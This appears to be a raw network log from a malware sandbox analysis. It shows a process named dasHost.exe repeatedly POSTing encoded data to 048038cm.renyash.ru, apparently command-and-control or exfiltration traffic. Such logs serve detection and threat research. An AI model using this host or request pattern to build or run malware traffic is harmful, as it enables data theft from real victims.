                                                                        Data Ascii: VWYTVEPR]_RVZ_X]W__[TTU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'(<>" ["5;#Z#-=><#V=3Y9)3X6 '[)%\ ![(
                                                                        Dec 28, 2024 20:43:51.226088047 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:51.467955112 CET814INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZUlzEO%2BIJeDvBDkLqYf5rYp2jgeeacMQlOdLenbhbEQqxvGxxvJqyzvLEndEXiOdPaNE%2F2K%2F2p6JN7O9cROB1C1eFA0kRRJYIQs%2FrgxlT%2BlySB%2B7K%2Fg65k606eY8BUF%2Fkh0BARql"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940aa82c0a78dc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4045&min_rtt=1920&rtt_var=4970&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=77154&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        41192.168.2.449879104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:51.751000881 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:52.110512972 CET2584OUTData Raw: 56 55 59 50 53 44 50 5c 5d 5f 52 56 5a 5d 58 54 57 50 5f 5b 54 54 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYPSDP\]_RVZ]XTWP_[TTUCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+Z"!;Z7%$_-8?Z!._= $><<."0?\=,%\ ![(3
                                                                        Dec 28, 2024 20:43:52.881959915 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:53.125525951 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqECRCWXoX4O%2BnHn8k5FMm2EpSPIg%2FVCFweeJGui8sZJZVPmV4DDhdm5SDnD8ogoWarxs9NaPS96Q5SuxhOz1VT%2FEZanjHHeC54QnC%2BeCxGYfg2MBQYKe504omgsCCl%2BEUlPOGdu"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ab298bd8c1e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4817&min_rtt=1988&rtt_var=6405&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=59284&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        42192.168.2.449885104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:53.371210098 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:53.719923973 CET2584OUTData Raw: 56 54 59 5f 56 45 55 59 5d 5f 52 56 5a 5b 58 59 57 50 5f 58 54 5c 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VTY_VEUY]_RVZ[XYWP_XT\UGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$[+2"+4[7<[-8 #&\=[?P#*8.*(##;[*<%\ ![(+
                                                                        Dec 28, 2024 20:43:54.892842054 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:54.893074036 CET811INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qfUPFo0Unbg75aX20Nh92%2BdNhFtgl4G2%2Bc99G%2FwvMGn8jn769UmC0Qje2wOlT1yJIO8t3bzEvHmaI54WkfNcQxzlgVIqipyxL1xx8Nj8VOhgaPGnnWY4JU4S9dgE%2B%2Fx2R3SFDX2%2B"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940abcbe8141c1-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3541&min_rtt=2069&rtt_var=3721&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=105399&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0
                                                                        Dec 28, 2024 20:43:54.895816088 CET811INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qfUPFo0Unbg75aX20Nh92%2BdNhFtgl4G2%2Bc99G%2FwvMGn8jn769UmC0Qje2wOlT1yJIO8t3bzEvHmaI54WkfNcQxzlgVIqipyxL1xx8Nj8VOhgaPGnnWY4JU4S9dgE%2B%2Fx2R3SFDX2%2B"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940abcbe8141c1-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3541&min_rtt=2069&rtt_var=3721&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=105399&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        43192.168.2.449887104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:55.152890921 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:55.501260042 CET2584OUTData Raw: 56 54 59 55 53 45 55 5e 5d 5f 52 56 5a 51 58 5c 57 5c 5f 5b 54 54 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VTYUSEU^]_RVZQX\W\_[TTUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X),[5(4"5,Y-+7]#.)-/"9/)/99+[6><%\ ![(
                                                                        Dec 28, 2024 20:43:56.282757044 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:56.523976088 CET811INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEN3Df86ZZe%2F5qa234tRuomSlIik%2BATTE0aemOfQkB%2F%2BTpTUBsiBifPwvM489XWewcGud8I4uVKj%2BzLKS0tkwZdnq7K9yUybuKG2il7aUetxtmA2Z3hIXyycC2QQE9230sSgSv2%2B"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ac7db8b5e78-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3159&min_rtt=1567&rtt_var=3772&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=102047&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        44192.168.2.449892104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:56.770175934 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:57.126178026 CET2584OUTData Raw: 56 51 59 53 56 40 55 58 5d 5f 52 56 5a 59 58 58 57 51 5f 5e 54 52 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VQYSV@UX]_RVZYXXWQ_^TRU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$?68(Z#S',+7\7>Y=[< *4)?:_'" ;Z>%\ ![(#
                                                                        Dec 28, 2024 20:43:57.948057890 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:58.201148033 CET810INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:58 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ThUi9058%2B%2BK%2BWXuRN%2BDGnG0KLmi4RPt8dkSoNUBEJ0%2BatD%2Fmo2bKvNEZsPMZItdKvXyCqQln9tvzIAp4VeLa9hj9ppNHbsWnvws7qvHu6rIPsYuhhmxe2IqZID2Q4P9LGS53O3Sm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ad22fa642be-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4078&min_rtt=2463&rtt_var=4154&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=94891&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        45192.168.2.449898104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:58.479480982 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:58.829238892 CET2584OUTData Raw: 56 5b 5c 55 56 49 50 5d 5d 5f 52 56 5a 5b 58 55 57 59 5f 5c 54 53 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[\UVIP]]_RVZ[XUWY_\TSUDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_+<\5+<^"%/3[!.>=+V#(*89)753?)<%\ ![(+
                                                                        Dec 28, 2024 20:43:59.613854885 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:59.856158018 CET807INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KVf91rsR%2BL3Mua2Zlpk3Im2jq3a%2FwgrOvp2upAs1rx76RcoxktKKP1QsSAuM0Ym5WTY7MFXoUpXxIDdzBvaMD%2BbvV1teBxbqgQgG6Gahvgk8lQDHbLUxDwt7MXME649%2BMnaRSviu"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940adc993a4239-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7909&min_rtt=1595&rtt_var=13226&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=28019&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        46192.168.2.449904104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:00.105099916 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:00.454277039 CET2584OUTData Raw: 53 50 59 56 56 41 55 5f 5d 5f 52 56 5a 5e 58 5c 57 59 5f 51 54 54 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SPYVVAU_]_RVZ^X\WY_QTTU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_<<9]!];#%,^/] 4>9*=07*3),/Y9*#5?=%\ ![(?
                                                                        Dec 28, 2024 20:44:01.287153006 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:01.540999889 CET810INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Go%2FnTB15xiLThy0Wy9Aa%2B3hszhDL%2BjnLHnz2caIk0iZnhV0rHLFqicuhKMuKy8fiepbxqqrVpcD8E4t0UEQwD4lrCEBJgCU88kJZaM4vWdWK%2FAqfShRu%2F0WVruDki42ec1z9p1%2Bt"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ae70e214277-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4340&min_rtt=2085&rtt_var=5292&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=72535&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        47192.168.2.449906104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:02.023562908 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:02.376167059 CET2584OUTData Raw: 53 55 5c 52 56 45 50 59 5d 5f 52 56 5a 5c 58 5b 57 58 5f 5d 54 57 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SU\RVEPY]_RVZ\X[WX_]TWU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'(!Z!;(Y %88,7X:X)? 90>8:?Z!#3Z=%\ ![(7
                                                                        Dec 28, 2024 20:44:03.117609024 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:03.356231928 CET810INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EnkQghipJb%2F1GBP6i9QqGyyQH0wSh%2FoYvnQCAqGQCZXFsxiZkI22xzp%2FoBvdhal%2FYnGxMmAObjSLPMVlGa43QF23PZTyBy3ttXd8WahW90PMO7BrFXpkgL6eMi5%2FQRSmZdQb%2B8fk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940af28eb032ee-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=5376&min_rtt=2746&rtt_var=6291&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=61367&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        48192.168.2.449911104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:03.647574902 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:04.001158953 CET2584OUTData Raw: 56 53 59 56 53 46 50 5c 5d 5f 52 56 5a 5b 58 5b 57 5f 5f 5a 54 57 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VSYVSFP\]_RVZ[X[W__ZTWUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'(,1]!$Z#6$-;#\!>>- V*Y/[99 # ),%\ ![(+
                                                                        Dec 28, 2024 20:44:04.736143112 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:04.979186058 CET813INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pVm6SBK1bF8ttL7%2FTL%2Fi9ZA1Tk8J%2BZika%2BvXiaT5L%2Bd%2F57WTmUaQLo5T5jeBBd33pZvi7KqOAALWAuQ6YLbDMdpi6y1ssKCcK%2BkfXiuwwN0cJ8txenUttSVDNn5vAHqcKJPPceIH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940afca9144376-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3301&min_rtt=1715&rtt_var=3816&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=101339&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        49192.168.2.449917104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:05.425996065 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:05.782461882 CET2584OUTData Raw: 53 56 59 53 53 42 55 59 5d 5f 52 56 5a 5a 58 5f 57 50 5f 5a 54 50 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SVYSSBUY]_RVZZX_WP_ZTPU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^+/=]!($7& 8(<#=1)=07)7)/<,9+X# ]*%\ ![(/
                                                                        Dec 28, 2024 20:44:06.632666111 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:06.758754015 CET802INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
